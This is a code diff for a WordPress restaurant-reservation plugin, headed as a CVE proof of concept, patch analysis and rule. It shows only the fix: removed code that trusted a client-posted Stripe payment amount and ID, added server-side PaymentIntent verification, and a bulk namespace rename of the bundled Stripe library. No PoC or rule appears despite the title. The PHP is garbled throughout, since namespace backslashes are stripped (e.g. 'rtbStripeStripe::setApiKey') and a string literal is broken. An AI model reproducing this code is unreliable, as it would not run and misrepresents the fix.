CVE-2026-54830: Five Star Restaurant Reservations – WordPress Booking Plugin <= 2.7.19 Missing Authorization PoC, Patch Analysis & Rule

--- a/restaurant-reservations/includes/PaymentGatewayStripe.class.php
+++ b/restaurant-reservations/includes/PaymentGatewayStripe.class.php
@@ -216,7 +216,7 @@
     // retrieve the token generated by stripe.js
     $token = sanitize_text_field( $_POST['stripeToken'] );

-    // JPY currency does not have any decimal palces
+    // JPY currency does not have any decimal places
     $payment_amount = $rtb_controller->settings->get_setting( 'rtb-currency' ) != 'JPY' ? $booking->calculate_deposit() * 100 : $booking->calculate_deposit();

     try {
@@ -231,8 +231,8 @@
         )
       );

-      StripeStripe::setApiKey( $this->get_secret() );
-      $charge = StripeCharge::create(
+      rtbStripeStripe::setApiKey( $this->get_secret() );
+      $charge = rtbStripeCharge::create(
         array(
           'amount'    => $payment_amount,
           'currency'  => strtolower( $rtb_controller->settings->get_setting( 'rtb-currency' ) ),
@@ -308,9 +308,9 @@

     try {

-      StripeStripe::setApiKey( $this->get_secret() );
+      rtbStripeStripe::setApiKey( $this->get_secret() );

-      // $customer = StripeCustomer::create(array(
+      // $customer = rtbStripeCustomer::create(array(
       //  'email' => $booking->email,
       //  'name' => $booking->name
       // );
@@ -357,7 +357,7 @@
         $intent_data['capture_method'] = 'manual';
       }

-      $intent = StripePaymentIntent::create( $intent_data );
+      $intent = rtbStripePaymentIntent::create( $intent_data );

       // Used this for verification of two step payment processing under SCA
       $booking->stripe_payment_intent_id = $intent->id;
@@ -412,9 +412,18 @@
           throw new Exception( __( 'Invalid submission. Please contact admin', 'restaurant-reservations' ) );
         }

-        $booking->deposit = $rtb_controller->settings->get_setting( 'rtb-currency' ) != 'JPY' ? intval( $_POST['payment_amount'] ) / 100 : intval( $_POST['payment_amount'] );
+        // Read the amount from the verified Stripe intent:

-        $booking->receipt_id = sanitize_text_field( $_POST['payment_id'] );
+        // load the stripe libraries
+        require_once( RTB_PLUGIN_DIR . '/lib/stripe/init.php' );
+
+        rtbStripeStripe::setApiKey( $this->get_secret() );
+
+        $intent = rtbStripePaymentIntent::retrieve( $booking->stripe_payment_intent_id );
+
+        $booking->deposit = $rtb_controller->settings->get_setting( 'rtb-currency' ) != 'JPY' ? $intent->amount / 100 : $intent->amount;
+
+        $booking->receipt_id = $intent->id;

         // Not needed anymore
         unset( $booking->stripe_payment_intent_id );
@@ -449,13 +458,48 @@
   }

   /**
-   * Validate the payment success request by verifing the payment_intent ID
+   * Validate the payment success request by verifying the payment_intent ID
    *
-   * @return bool true on valid else false
+   * @param  rtbBooking $booking
+   * @return bool true if Stripe confirms payment else false
    */
   public function valid_payment( $booking ) {
+    global $rtb_controller;
+
+    // Must have an intent ID stored server-side from the intent-creation step
+    if ( empty( $booking->stripe_payment_intent_id ) ) { return false; }
+
+    // The posted payment_id must match what we stored
+    $posted_id = sanitize_text_field( $_POST['payment_id'] ?? '' );
+    if ( $posted_id !== $booking->stripe_payment_intent_id ) { return false; }
+
+    // Ask Stripe if the intent was actually paid
+    try {
+
+      // load the stripe libraries
+      require_once( RTB_PLUGIN_DIR . '/lib/stripe/init.php' );
+
+      rtbStripeStripe::setApiKey( $this->get_secret() );

-    return ! empty( $booking->stripe_payment_intent_id ) && sanitize_text_field( $_POST['payment_id'] ) === $booking->stripe_payment_intent_id;
+      $intent = rtbStripePaymentIntent::retrieve( $booking->stripe_payment_intent_id );
+
+      $is_hold = $rtb_controller->settings->get_setting( 'rtb-stripe-hold' );
+
+      // For normal payments: status must be 'succeeded'
+      // For hold/manual-capture: status must be 'requires_capture'
+      $valid_status = $is_hold ? 'requires_capture' : 'succeeded';
+
+      return $intent->status === $valid_status;
+    }
+    catch ( Exception $ex ) {
+
+      if ( defined('WP_DEBUG') && WP_DEBUG ) {
+
+        error_log( sprintf( __( 'Five Star RTB Stripe valid_payment error: %s', 'restaurant-reservations' ), $ex->getMessage() ) );
+      }
+
+      return false;
+    }
   }

   /**
@@ -599,9 +643,9 @@
           // load the stripe libraries
           require_once( RTB_PLUGIN_DIR . '/lib/stripe/init.php' );

-          StripeStripe::setApiKey( $this->get_secret() );
+          rtbStripeStripe::setApiKey( $this->get_secret() );

-          $intent = StripePaymentIntent::retrieve( $booking->receipt_id );
+          $intent = rtbStripePaymentIntent::retrieve( $booking->receipt_id );
           $intent->capture();

           if( 'succeeded' == $intent->status ) {
--- a/restaurant-reservations/lib/stripe/lib/Account.php
+++ b/restaurant-reservations/lib/stripe/lib/Account.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * This is an object representing a Stripe account. You can retrieve it to see
@@ -15,23 +15,23 @@
  *
  * @property string $id Unique identifier for the object.
  * @property string $object String representing the object's type. Objects of the same type share the same value.
- * @property null|StripeStripeObject $business_profile Business information about the account.
+ * @property null|rtbStripeStripeObject $business_profile Business information about the account.
  * @property null|string $business_type The business type.
- * @property StripeStripeObject $capabilities
+ * @property rtbStripeStripeObject $capabilities
  * @property bool $charges_enabled Whether the account can create live charges.
- * @property StripeStripeObject $company
+ * @property rtbStripeStripeObject $company
  * @property string $country The account's country.
  * @property int $created Time at which the object was created. Measured in seconds since the Unix epoch.
  * @property string $default_currency Three-letter ISO currency code representing the default currency for the account. This must be a currency that <a href="https://stripe.com/docs/payouts">Stripe supports in the account's country</a>.
  * @property bool $details_submitted Whether account details have been submitted. Standard accounts cannot receive payouts before this is true.
  * @property null|string $email An email address associated with the account. You can treat this as metadata: it is not used for authentication or messaging account holders.
- * @property StripeCollection $external_accounts External accounts (bank accounts and debit cards) currently attached to this account
- * @property StripePerson $individual <p>This is an object representing a person associated with a Stripe account.</p><p>A platform cannot access a Standard or Express account's persons after the account starts onboarding, such as after generating an account link for the account. See the <a href="https://stripe.com/docs/connect/standard-accounts">Standard onboarding</a> or <a href="https://stripe.com/docs/connect/express-accounts">Express onboarding documentation</a> for information about platform pre-filling and account onboarding steps.</p><p>Related guide: <a href="https://stripe.com/docs/connect/identity-verification-api#person-information">Handling Identity Verification with the API</a>.</p>
- * @property StripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
+ * @property rtbStripeCollection $external_accounts External accounts (bank accounts and debit cards) currently attached to this account
+ * @property rtbStripePerson $individual <p>This is an object representing a person associated with a Stripe account.</p><p>A platform cannot access a Standard or Express account's persons after the account starts onboarding, such as after generating an account link for the account. See the <a href="https://stripe.com/docs/connect/standard-accounts">Standard onboarding</a> or <a href="https://stripe.com/docs/connect/express-accounts">Express onboarding documentation</a> for information about platform pre-filling and account onboarding steps.</p><p>Related guide: <a href="https://stripe.com/docs/connect/identity-verification-api#person-information">Handling Identity Verification with the API</a>.</p>
+ * @property rtbStripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
  * @property bool $payouts_enabled Whether Stripe can send payouts to this account.
- * @property StripeStripeObject $requirements
- * @property null|StripeStripeObject $settings Options for customizing how the account functions within Stripe.
- * @property StripeStripeObject $tos_acceptance
+ * @property rtbStripeStripeObject $requirements
+ * @property null|rtbStripeStripeObject $settings Options for customizing how the account functions within Stripe.
+ * @property rtbStripeStripeObject $tos_acceptance
  * @property string $type The Stripe account type. Can be <code>standard</code>, <code>express</code>, or <code>custom</code>.
  */
 class Account extends ApiResource
@@ -144,9 +144,9 @@
      *     options array containing an `id` key
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeAccount
+     * @return rtbStripeAccount
      */
     public static function retrieve($id = null, $opts = null)
     {
@@ -162,9 +162,9 @@
      * @param null|array $clientId
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject object containing the response from the API
+     * @return rtbStripeStripeObject object containing the response from the API
      */
     public function deauthorize($clientId = null, $opts = null)
     {
@@ -180,9 +180,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of persons
+     * @return rtbStripeCollection the list of persons
      */
     public function persons($params = null, $opts = null)
     {
@@ -198,7 +198,7 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return Account the rejected account
      */
@@ -224,9 +224,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of capabilities
+     * @return rtbStripeCollection the list of capabilities
      */
     public static function allCapabilities($id, $params = null, $opts = null)
     {
@@ -239,9 +239,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCapability
+     * @return rtbStripeCapability
      */
     public static function retrieveCapability($id, $capabilityId, $params = null, $opts = null)
     {
@@ -254,9 +254,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCapability
+     * @return rtbStripeCapability
      */
     public static function updateCapability($id, $capabilityId, $params = null, $opts = null)
     {
@@ -270,9 +270,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of external accounts (BankAccount or Card)
+     * @return rtbStripeCollection the list of external accounts (BankAccount or Card)
      */
     public static function allExternalAccounts($id, $params = null, $opts = null)
     {
@@ -284,9 +284,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBankAccount|StripeCard
+     * @return rtbStripeBankAccount|rtbStripeCard
      */
     public static function createExternalAccount($id, $params = null, $opts = null)
     {
@@ -299,9 +299,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBankAccount|StripeCard
+     * @return rtbStripeBankAccount|rtbStripeCard
      */
     public static function deleteExternalAccount($id, $externalAccountId, $params = null, $opts = null)
     {
@@ -314,9 +314,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBankAccount|StripeCard
+     * @return rtbStripeBankAccount|rtbStripeCard
      */
     public static function retrieveExternalAccount($id, $externalAccountId, $params = null, $opts = null)
     {
@@ -329,9 +329,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBankAccount|StripeCard
+     * @return rtbStripeBankAccount|rtbStripeCard
      */
     public static function updateExternalAccount($id, $externalAccountId, $params = null, $opts = null)
     {
@@ -345,9 +345,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeLoginLink
+     * @return rtbStripeLoginLink
      */
     public static function createLoginLink($id, $params = null, $opts = null)
     {
@@ -361,9 +361,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of persons
+     * @return rtbStripeCollection the list of persons
      */
     public static function allPersons($id, $params = null, $opts = null)
     {
@@ -375,9 +375,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripePerson
+     * @return rtbStripePerson
      */
     public static function createPerson($id, $params = null, $opts = null)
     {
@@ -390,9 +390,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripePerson
+     * @return rtbStripePerson
      */
     public static function deletePerson($id, $personId, $params = null, $opts = null)
     {
@@ -405,9 +405,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripePerson
+     * @return rtbStripePerson
      */
     public static function retrievePerson($id, $personId, $params = null, $opts = null)
     {
@@ -420,9 +420,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripePerson
+     * @return rtbStripePerson
      */
     public static function updatePerson($id, $personId, $params = null, $opts = null)
     {
--- a/restaurant-reservations/lib/stripe/lib/AccountLink.php
+++ b/restaurant-reservations/lib/stripe/lib/AccountLink.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Account Links are the means by which a Connect platform grants a connected
--- a/restaurant-reservations/lib/stripe/lib/AlipayAccount.php
+++ b/restaurant-reservations/lib/stripe/lib/AlipayAccount.php
@@ -1,6 +1,6 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Class AlipayAccount.
@@ -40,7 +40,7 @@
      * @param array|string $_id
      * @param null|array|string $_opts
      *
-     * @throws StripeExceptionBadMethodCallException
+     * @throws rtbStripeExceptionBadMethodCallException
      *
      * @deprecated Alipay accounts are deprecated. Please use the sources API instead.
      * @see https://stripe.com/docs/sources/alipay
@@ -59,7 +59,7 @@
      * @param null|array $_params
      * @param null|array|string $_options
      *
-     * @throws StripeExceptionBadMethodCallException
+     * @throws rtbStripeExceptionBadMethodCallException
      *
      * @deprecated Alipay accounts are deprecated. Please use the sources API instead.
      * @see https://stripe.com/docs/sources/alipay
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/All.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/All.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for listable resources. Adds a `all()` static method to the class.
@@ -13,9 +13,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection of ApiResources
+     * @return rtbStripeCollection of ApiResources
      */
     public static function all($params = null, $opts = null)
     {
@@ -23,10 +23,10 @@
         $url = static::classUrl();

         list($response, $opts) = static::_staticRequest('get', $url, $params, $opts);
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
-        if (!($obj instanceof StripeCollection)) {
-            throw new StripeExceptionUnexpectedValueException(
-                'Expected type ' . StripeCollection::class . ', got "' . get_class($obj) . '" instead.'
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
+        if (!($obj instanceof rtbStripeCollection)) {
+            throw new rtbStripeExceptionUnexpectedValueException(
+                'Expected type ' . rtbStripeCollection::class . ', got "' . get_class($obj) . '" instead.'
             );
         }
         $obj->setLastResponse($response);
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Create.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Create.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for creatable resources. Adds a `create()` static method to the class.
@@ -13,7 +13,7 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static the created resource
      */
@@ -23,7 +23,7 @@
         $url = static::classUrl();

         list($response, $opts) = static::_staticRequest('post', $url, $params, $options);
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
         $obj->setLastResponse($response);

         return $obj;
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Delete.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Delete.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for deletable resources. Adds a `delete()` method to the class.
@@ -13,7 +13,7 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static the deleted resource
      */
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/NestedResource.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/NestedResource.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for resources that have nested resources.
@@ -15,14 +15,14 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _nestedResourceOperation($method, $url, $params = null, $options = null)
     {
         self::_validateParams($params);

         list($response, $opts) = static::_staticRequest($method, $url, $params, $options);
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
         $obj->setLastResponse($response);

         return $obj;
@@ -51,9 +51,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _createNestedResource($id, $nestedPath, $params = null, $options = null)
     {
@@ -69,9 +69,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _retrieveNestedResource($id, $nestedPath, $nestedId, $params = null, $options = null)
     {
@@ -87,9 +87,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _updateNestedResource($id, $nestedPath, $nestedId, $params = null, $options = null)
     {
@@ -105,9 +105,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _deleteNestedResource($id, $nestedPath, $nestedId, $params = null, $options = null)
     {
@@ -122,9 +122,9 @@
      * @param null|array $params
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeStripeObject
+     * @return rtbStripeStripeObject
      */
     protected static function _allNestedResources($id, $nestedPath, $params = null, $options = null)
     {
--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Request.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Request.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for resources that need to make API requests.
@@ -12,17 +12,17 @@
     /**
      * @param null|array|mixed $params The list of parameters to validate
      *
-     * @throws StripeExceptionInvalidArgumentException if $params exists and is not an array
+     * @throws rtbStripeExceptionInvalidArgumentException if $params exists and is not an array
      */
     protected static function _validateParams($params = null)
     {
         if ($params && !is_array($params)) {
             $message = 'You must pass an array as the first argument to Stripe API '
                . 'method calls.  (HINT: an example call to create a charge '
-               . "would be: "Stripe\Charge::create(['amount' => 100, "
+               . "would be: "rtbStripe\Charge::create(['amount' => 100, "
                . "'currency' => 'usd', 'source' => 'tok_1234'])")";

-            throw new StripeExceptionInvalidArgumentException($message);
+            throw new rtbStripeExceptionInvalidArgumentException($message);
         }
     }

@@ -32,7 +32,7 @@
      * @param array $params list of parameters for the request
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return array tuple containing (the JSON response, $options)
      */
@@ -51,15 +51,15 @@
      * @param array $params list of parameters for the request
      * @param null|array|string $options
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return array tuple containing (the JSON response, $options)
      */
     protected static function _staticRequest($method, $url, $params, $options)
     {
-        $opts = StripeUtilRequestOptions::parse($options);
+        $opts = rtbStripeUtilRequestOptions::parse($options);
         $baseUrl = isset($opts->apiBase) ? $opts->apiBase : static::baseUrl();
-        $requestor = new StripeApiRequestor($opts->apiKey, $baseUrl);
+        $requestor = new rtbStripeApiRequestor($opts->apiKey, $baseUrl);
         list($response, $opts->apiKey) = $requestor->request($method, $url, $params, $opts->headers);
         $opts->discardNonPersistentHeaders();

--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Retrieve.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Retrieve.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for retrievable resources. Adds a `retrieve()` static method to the
@@ -15,13 +15,13 @@
      *     or an options array containing an `id` key
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static
      */
     public static function retrieve($id, $opts = null)
     {
-        $opts = StripeUtilRequestOptions::parse($opts);
+        $opts = rtbStripeUtilRequestOptions::parse($opts);
         $instance = new static($id, $opts);
         $instance->refresh();

--- a/restaurant-reservations/lib/stripe/lib/ApiOperations/Update.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiOperations/Update.php
@@ -1,6 +1,6 @@
 <?php

-namespace StripeApiOperations;
+namespace rtbStripeApiOperations;

 /**
  * Trait for updatable resources. Adds an `update()` static method and a
@@ -15,7 +15,7 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static the updated resource
      */
@@ -25,7 +25,7 @@
         $url = static::resourceUrl($id);

         list($response, $opts) = static::_staticRequest('post', $url, $params, $opts);
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
         $obj->setLastResponse($response);

         return $obj;
@@ -34,7 +34,7 @@
     /**
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return static the saved resource
      */
--- a/restaurant-reservations/lib/stripe/lib/ApiRequestor.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiRequestor.php
@@ -1,6 +1,6 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Class ApiRequestor.
--- a/restaurant-reservations/lib/stripe/lib/ApiResource.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiResource.php
@@ -1,6 +1,6 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Class ApiResource.
@@ -10,7 +10,7 @@
     use ApiOperationsRequest;

     /**
-     * @return StripeUtilSet A list of fields that can be their own type of
+     * @return rtbStripeUtilSet A list of fields that can be their own type of
      * API resource (say a nested card under an account for example), and if
      * that resource is set, it should be transmitted to the API on a create or
      * update. Doing so is not the default behavior because API resources
--- a/restaurant-reservations/lib/stripe/lib/ApiResponse.php
+++ b/restaurant-reservations/lib/stripe/lib/ApiResponse.php
@@ -1,8 +1,8 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

-use StripeUtilCaseInsensitiveArray;
+use rtbStripeUtilCaseInsensitiveArray;

 /**
  * Class ApiResponse.
--- a/restaurant-reservations/lib/stripe/lib/ApplePayDomain.php
+++ b/restaurant-reservations/lib/stripe/lib/ApplePayDomain.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * @property string $id Unique identifier for the object.
--- a/restaurant-reservations/lib/stripe/lib/ApplicationFee.php
+++ b/restaurant-reservations/lib/stripe/lib/ApplicationFee.php
@@ -2,23 +2,23 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * @property string $id Unique identifier for the object.
  * @property string $object String representing the object's type. Objects of the same type share the same value.
- * @property string|StripeAccount $account ID of the Stripe account this fee was taken from.
+ * @property string|rtbStripeAccount $account ID of the Stripe account this fee was taken from.
  * @property int $amount Amount earned, in %s.
  * @property int $amount_refunded Amount in %s refunded (can be less than the amount attribute on the fee if a partial refund was issued)
- * @property string|StripeStripeObject $application ID of the Connect application that earned the fee.
- * @property null|string|StripeBalanceTransaction $balance_transaction Balance transaction that describes the impact of this collected application fee on your account balance (not including refunds).
- * @property string|StripeCharge $charge ID of the charge that the application fee was taken from.
+ * @property string|rtbStripeStripeObject $application ID of the Connect application that earned the fee.
+ * @property null|string|rtbStripeBalanceTransaction $balance_transaction Balance transaction that describes the impact of this collected application fee on your account balance (not including refunds).
+ * @property string|rtbStripeCharge $charge ID of the charge that the application fee was taken from.
  * @property int $created Time at which the object was created. Measured in seconds since the Unix epoch.
  * @property string $currency Three-letter <a href="https://www.iso.org/iso-4217-currency-codes.html">ISO currency code</a>, in lowercase. Must be a <a href="https://stripe.com/docs/currencies">supported currency</a>.
  * @property bool $livemode Has the value <code>true</code> if the object exists in live mode or the value <code>false</code> if the object exists in test mode.
- * @property null|string|StripeCharge $originating_transaction ID of the corresponding charge on the platform account, if this fee was the result of a charge using the <code>destination</code> parameter.
+ * @property null|string|rtbStripeCharge $originating_transaction ID of the corresponding charge on the platform account, if this fee was the result of a charge using the <code>destination</code> parameter.
  * @property bool $refunded Whether the fee has been fully refunded. If the fee is only partially refunded, this attribute will still be false.
- * @property StripeCollection $refunds A list of refunds that have been applied to the fee.
+ * @property rtbStripeCollection $refunds A list of refunds that have been applied to the fee.
  */
 class ApplicationFee extends ApiResource
 {
@@ -35,9 +35,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeCollection the list of fee refunds
+     * @return rtbStripeCollection the list of fee refunds
      */
     public static function allRefunds($id, $params = null, $opts = null)
     {
@@ -49,9 +49,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeApplicationFeeRefund
+     * @return rtbStripeApplicationFeeRefund
      */
     public static function createRefund($id, $params = null, $opts = null)
     {
@@ -64,9 +64,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeApplicationFeeRefund
+     * @return rtbStripeApplicationFeeRefund
      */
     public static function retrieveRefund($id, $refundId, $params = null, $opts = null)
     {
@@ -79,9 +79,9 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeApplicationFeeRefund
+     * @return rtbStripeApplicationFeeRefund
      */
     public static function updateRefund($id, $refundId, $params = null, $opts = null)
     {
--- a/restaurant-reservations/lib/stripe/lib/ApplicationFeeRefund.php
+++ b/restaurant-reservations/lib/stripe/lib/ApplicationFeeRefund.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * <code>Application Fee Refund</code> objects allow you to refund an application
@@ -16,11 +16,11 @@
  * @property string $id Unique identifier for the object.
  * @property string $object String representing the object's type. Objects of the same type share the same value.
  * @property int $amount Amount, in %s.
- * @property null|string|StripeBalanceTransaction $balance_transaction Balance transaction that describes the impact on your account balance.
+ * @property null|string|rtbStripeBalanceTransaction $balance_transaction Balance transaction that describes the impact on your account balance.
  * @property int $created Time at which the object was created. Measured in seconds since the Unix epoch.
  * @property string $currency Three-letter <a href="https://www.iso.org/iso-4217-currency-codes.html">ISO currency code</a>, in lowercase. Must be a <a href="https://stripe.com/docs/currencies">supported currency</a>.
- * @property string|StripeApplicationFee $fee ID of the application fee that was refunded.
- * @property null|StripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
+ * @property string|rtbStripeApplicationFee $fee ID of the application fee that was refunded.
+ * @property null|rtbStripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
  */
 class ApplicationFeeRefund extends ApiResource
 {
--- a/restaurant-reservations/lib/stripe/lib/Balance.php
+++ b/restaurant-reservations/lib/stripe/lib/Balance.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
